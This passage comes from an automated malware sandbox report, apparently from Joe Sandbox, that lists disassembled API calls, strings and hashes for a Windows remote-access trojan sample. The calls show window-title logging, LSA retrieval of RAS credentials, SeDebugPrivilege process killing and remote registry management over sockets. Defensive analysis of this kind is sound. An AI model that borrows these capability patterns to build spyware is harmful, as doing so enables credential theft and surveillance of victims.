                        • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 100091ED
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001), ref: 10009207
                        • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000920E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandlePointerWrite
                        • String ID: p
                        • API String ID: 3604237281-2181537457
                        • Opcode ID: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                        • Instruction ID: c29a3a25608ae6e4858f618ea9f01b6aa6551fe5910cd7b292a73e7336b4a8fb
                        • Opcode Fuzzy Hash: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                        • Instruction Fuzzy Hash: 8611CE71244312ABE304DF54CC85F6BB7E9EFD9715F040A1DF6449B2D0E7B4AA098BA2
                        APIs
                          • Part of subcall function 1000D5D0: RtlEnterCriticalSection.NTDLL(?), ref: 1000D5D8
                          • Part of subcall function 1000D5D0: RtlLeaveCriticalSection.NTDLL(?), ref: 1000D5F2
                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D656
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D664
                        • FreeLibrary.KERNEL32(00000000), ref: 1000D676
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                        • String ID: closesocket$ws2_32.dll
                        • API String ID: 2819327233-181964208
                        • Opcode ID: 227b4ddc28ed2b789dbb372061b8aa4e8a57007cd9a807f8c58f6723425c27a5
                        • Instruction ID: c7a85589b374110c36b37f56cd0419c948af16733dbc941b48c3ffccf564ddd3
                        • Opcode Fuzzy Hash: 227b4ddc28ed2b789dbb372061b8aa4e8a57007cd9a807f8c58f6723425c27a5
                        • Instruction Fuzzy Hash: 50F02776000B20ABE210EF289C84D9F7798EB89722F000629FA4086241CB349904C7B6
                        APIs
                        • GetStartupInfoA.KERNEL32(?), ref: 00403A82
                        • GetFileType.KERNEL32(00000800), ref: 00403B28
                        • GetStdHandle.KERNEL32(-000000F6), ref: 00403B81
                        • GetFileType.KERNEL32(00000000), ref: 00403B8F
                        • SetHandleCount.KERNEL32 ref: 00403BC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: FileHandleType$CountInfoStartup
                        • String ID:
                        • API String ID: 1710529072-0
                        • Opcode ID: 118daacb8ad3a432c1052072e65d4aef40e619f482eec3fc3d300b61cce5d762
                        • Instruction ID: d76856ce9a64dd3daf10aa6f0c08c049f46bccca71c3927d2cedc3f9f2fa99cb
                        • Opcode Fuzzy Hash: 118daacb8ad3a432c1052072e65d4aef40e619f482eec3fc3d300b61cce5d762
                        • Instruction Fuzzy Hash: 5D5147316042048BD730DF28CC447573FB8AB1172AF55427ED4A6E72E2D778AA49CB59
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F413
                        • CloseHandle.KERNEL32(?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F41D
                        • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F441
                        • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F472
                          • Part of subcall function 1000FD20: LoadCursorA.USER32(00000000,00000000), ref: 1000FDE3
                        • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F499
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CloseCursorHandleLoadObjectSingleWait
                        • String ID:
                        • API String ID: 1916621575-0
                        • Opcode ID: 30cb649d545099e3b134517d6e3a6ff664e7b1fcc6bc595678dda8d4b5caa323
                        • Instruction ID: af10be2d057552379ca070793410e945b71ac961525771fe911eddac7fa67470
                        • Opcode Fuzzy Hash: 30cb649d545099e3b134517d6e3a6ff664e7b1fcc6bc595678dda8d4b5caa323
                        • Instruction Fuzzy Hash: 0E31D4B1B447416BE360CF288C46B5BBAE5EF85750F000A2DF69A9B6C1D7B0E448C792
                        APIs
                        • CreateDIBSection.GDI32(10010396,?,00000000,10010396,00000000,00000000), ref: 100105BE
                        • SelectObject.GDI32(?,00000000), ref: 100105CD
                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 100105EA
                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001060A
                        • DeleteObject.GDI32(?), ref: 10010632
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Object$CreateDeleteSectionSelect
                        • String ID:
                        • API String ID: 3188413882-0
                        • Opcode ID: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                        • Instruction ID: 17709fe5c9bee505a466ed7633a8078ca6610504c6facd25fdc6690399d5a77f
                        • Opcode Fuzzy Hash: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                        • Instruction Fuzzy Hash: 3631D2B6200705AFE214CF59CC84E27F7AAFB88710F108A1DFA9587795C7B1F8408BA0
                        APIs
                        • GetForegroundWindow.USER32 ref: 10009A96
                        • GetWindowTextA.USER32(00000000,1007E37C,00000400), ref: 10009AAC
                        • lstrlen.KERNEL32(1007E37C), ref: 10009AE1
                        • GetLocalTime.KERNEL32(?), ref: 10009AF4
                        • wsprintfA.USER32 ref: 10009B49
                          • Part of subcall function 10009930: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10009944
                          • Part of subcall function 10009930: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100099FB
                          • Part of subcall function 10009930: GetFileSize.KERNEL32(00000000,00000000), ref: 10009A0E
                          • Part of subcall function 10009930: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009A22
                          • Part of subcall function 10009930: lstrlen.KERNEL32(?), ref: 10009A30
                          • Part of subcall function 10009930: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10009A39
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Windowlstrlen$??2@CreateDirectoryForegroundLocalPointerSizeSystemTextTimewsprintf
                        • String ID:
                        • API String ID: 1247169605-0
                        • Opcode ID: d5d440a03ae440b4868d873a8e62c6d5429f052b4cf7eb20d56548b6380e63a3
                        • Instruction ID: b9f57a072098cc30263dd14e1e0347184811832503b0d4ba37cec8025abd72ce
                        • Opcode Fuzzy Hash: d5d440a03ae440b4868d873a8e62c6d5429f052b4cf7eb20d56548b6380e63a3
                        • Instruction Fuzzy Hash: D421AFB1205393ABF304CB28CC98A6776A6EF8C710F408A38F68597290D67C9D488B56
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 10012BE8
                        • GetThreadDesktop.USER32(00000000), ref: 10012BEF
                        • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 10012C10
                        • SetThreadDesktop.USER32(?), ref: 10012C24
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$Desktop$CurrentInformationObjectUser
                        • String ID:
                        • API String ID: 3041254040-0
                        • Opcode ID: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                        • Instruction ID: 1aa550abbb95f75a1cbcec525135b1f273917451a5e44a8caf5b10736729aa80
                        • Opcode Fuzzy Hash: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                        • Instruction Fuzzy Hash: A4F059B12002606BF3109728DCC9BEF3759FF84725F804435F640C2050FBF8898581E2
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleeplstrlenwsprintf
                        • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                        • API String ID: 1736695411-3973614608
                        • Opcode ID: 94f497dffb1bef5f3e62e50f885c10ea256d70318ec0c8f9adc222c6de03b443
                        • Instruction ID: b16c557489325780dc41c0752768b57e954bfeb3216f92d6d969889069997215
                        • Opcode Fuzzy Hash: 94f497dffb1bef5f3e62e50f885c10ea256d70318ec0c8f9adc222c6de03b443
                        • Instruction Fuzzy Hash: 46F0E2B5500321BFF320AB54DC49FEB3BA9DFC4308F004818FB48A6191D2B56A89C6E6
                        APIs
                        • CoCreateInstance.OLE32(10070454,00000000,00000001,100703C4,?), ref: 10019330
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInstance
                        • String ID: FriendlyName
                        • API String ID: 542301482-3623505368
                        • Opcode ID: 660ee549ab857ccc2a3e0e8018f4041201d3708b72596babb579123d471cc425
                        • Instruction ID: 80cbb2717d17b0c08811b6de504c2084bbc1f937f163f1ab5e3a18075972b324
                        • Opcode Fuzzy Hash: 660ee549ab857ccc2a3e0e8018f4041201d3708b72596babb579123d471cc425
                        • Instruction Fuzzy Hash: C0410671204341AFD210DF64CC84F5AB7E9FBC9B24F108A18B5A9DB290DB75E846CB62
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D28B
                        • DeleteFileA.KERNEL32(?), ref: 1000D338
                          • Part of subcall function 1000D0D0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D102
                          • Part of subcall function 1000D0D0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D1B9
                          • Part of subcall function 1000D0D0: GetFileSize.KERNEL32(00000000,00000000), ref: 1000D1C8
                          • Part of subcall function 1000D0D0: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D1D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$DirectorySystem$??2@CreateDeleteSize
                        • String ID: .key$XXXXXX
                        • API String ID: 2930496114-2601115946
                        • Opcode ID: ae07148d8bb9eb93f010ba8bf2deb028565ee777514af0f51f669a9ee2717ab0
                        • Instruction ID: 58dd92c60c2c1446215199cafdfc7cfc7d180e3c760536d4116d3be8e1391897
                        • Opcode Fuzzy Hash: ae07148d8bb9eb93f010ba8bf2deb028565ee777514af0f51f669a9ee2717ab0
                        • Instruction Fuzzy Hash: A0310432A006085BDB28DAB888527AEB796FB85770F14032EF626973C0DFF45E448790
                        APIs
                        • LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 10007362
                        • LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 10007395
                        Strings
                        • L$_RasDefaultCredentials#0, xrefs: 10007345
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: DataOpenPolicyPrivateRetrieve
                        • String ID: L$_RasDefaultCredentials#0
                        • API String ID: 1655749231-2801509457
                        • Opcode ID: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                        • Instruction ID: c33f2f5ebb2e4ab79ed7a152476c9e66349a4213c8409a4b1f5592358f7a1927
                        • Opcode Fuzzy Hash: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                        • Instruction Fuzzy Hash: 4601D8B26043026FF708DA69CC42DBBB3D9EBD4754F408D2DF944C6150E674E949C392
                        APIs
                        • OutputDebugStringA.KERNEL32(s Loop_RegeditManager(SOCKET sRemote)), ref: 1000A067
                          • Part of subcall function 10003990: WSAStartup.WS2_32(00000202,?), ref: 100039FD
                          • Part of subcall function 10003990: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10003A0B
                          • Part of subcall function 10003B50: ResetEvent.KERNEL32(?,74DF23A0,00000000,?,?,?,?,?,10002764,?,?), ref: 10003B63
                          • Part of subcall function 10003B50: socket.WS2_32 ref: 10003B76
                        • OutputDebugStringA.KERNEL32(s !socketClient.Connect !=-1), ref: 1000A0B3
                          • Part of subcall function 10003A90: WaitForSingleObject.KERNEL32(?,000000FF,00000000,74DF2EE0,?,00000000,10069E7C,000000FF,100028C0), ref: 10003ACC
                          • Part of subcall function 10003A90: CloseHandle.KERNEL32(?), ref: 10003AEF
                          • Part of subcall function 10003A90: CloseHandle.KERNEL32(?), ref: 10003AF8
                          • Part of subcall function 10003A90: WSACleanup.WS2_32 ref: 10003AFA
                        Strings
                        • s Loop_RegeditManager(SOCKET sRemote), xrefs: 1000A062
                        • s !socketClient.Connect !=-1, xrefs: 1000A0AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseDebugEventHandleOutputString$CleanupCreateObjectResetSingleStartupWaitsocket
                        • String ID: s !socketClient.Connect !=-1$s Loop_RegeditManager(SOCKET sRemote)
                        • API String ID: 660129190-2143064718
                        • Opcode ID: b3408c2e665004f642960889d79e8bb37457511fe7675c174eea74838ca707a4
                        • Instruction ID: 33de5455edd4078826519d4261a1314639563161ec7838f0291edb895abbdde2
                        • Opcode Fuzzy Hash: b3408c2e665004f642960889d79e8bb37457511fe7675c174eea74838ca707a4
                        • Instruction Fuzzy Hash: 1111A3750082818AE360DF64DD51BDB77D4EB95760F008B0EB5AA632C4DF342848CB73
                        APIs
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100120C3
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 100120CE
                        • CloseHandle.KERNEL32(00000000), ref: 100120D5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Open$CloseCurrentHandleTerminateToken
                        • String ID: SeDebugPrivilege
                        • API String ID: 3822579153-2896544425
                        • Opcode ID: 46e03eeb43237c4219530782c3061b1ca488fb5b3c0c060921b95a0ed9a673e8
                        • Instruction ID: a8318dda45e3085a9c140345e5cc1122ef3a856107f5b2395552c34a9f699ba3
                        • Opcode Fuzzy Hash: 46e03eeb43237c4219530782c3061b1ca488fb5b3c0c060921b95a0ed9a673e8
                        • Instruction Fuzzy Hash: 73F044767003112BE114EB548C86F7F779AEFC4750F000428FB402B242CBB0ACA182B2
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 10012CA1
                        • GetThreadDesktop.USER32(00000000), ref: 10012CA8
                          • Part of subcall function 10012C50: OpenDesktopA.USER32(?,00000000,00000000,400001CF), ref: 10012C63
                        • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 10012CD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: DesktopThread$CurrentMessageOpenPost
                        • String ID: Winlogon
                        • API String ID: 1322334875-744610081
                        • Opcode ID: e147b5548efc162c12c2a63e82a41f61971f056e15de3ebd1f44cc4f1de22b03
                        • Instruction ID: 70ef0cdf761ecaa1c5cd624777e035ee06562f4c287f95f11dac0264ad6e66fe
                        • Opcode Fuzzy Hash: e147b5548efc162c12c2a63e82a41f61971f056e15de3ebd1f44cc4f1de22b03
                        • Instruction Fuzzy Hash: 8AE086B2A4176027F61167707C4AFDE22459F05741F064430FB019E182E6A4EEE251D2
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,WaitForMultipleObjects), ref: 1001161A
                        • GetProcAddress.KERNEL32(00000000), ref: 10011621
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: WaitForMultipleObjects$kernel32.dll
                        • API String ID: 2574300362-425320575
                        • Opcode ID: 6075e51fa116afd9420e75921e96e9c4f61b5407291641b036638b2c256c607b
                        • Instruction ID: abd7cf47b72cea9b357ea9cf502593f308c5542d5c2b7bb7961bb643003d0c13
                        • Opcode Fuzzy Hash: 6075e51fa116afd9420e75921e96e9c4f61b5407291641b036638b2c256c607b
                        • Instruction Fuzzy Hash: F9C04CB14067A8EFFB049F708C8C6883E7AEE8A7127544540F745DB125CBBA5481AA1D
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,PeekNamedPipe), ref: 1001151A
                        • GetProcAddress.KERNEL32(00000000), ref: 10011521
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: PeekNamedPipe$kernel32.dll
                        • API String ID: 2574300362-3402591003
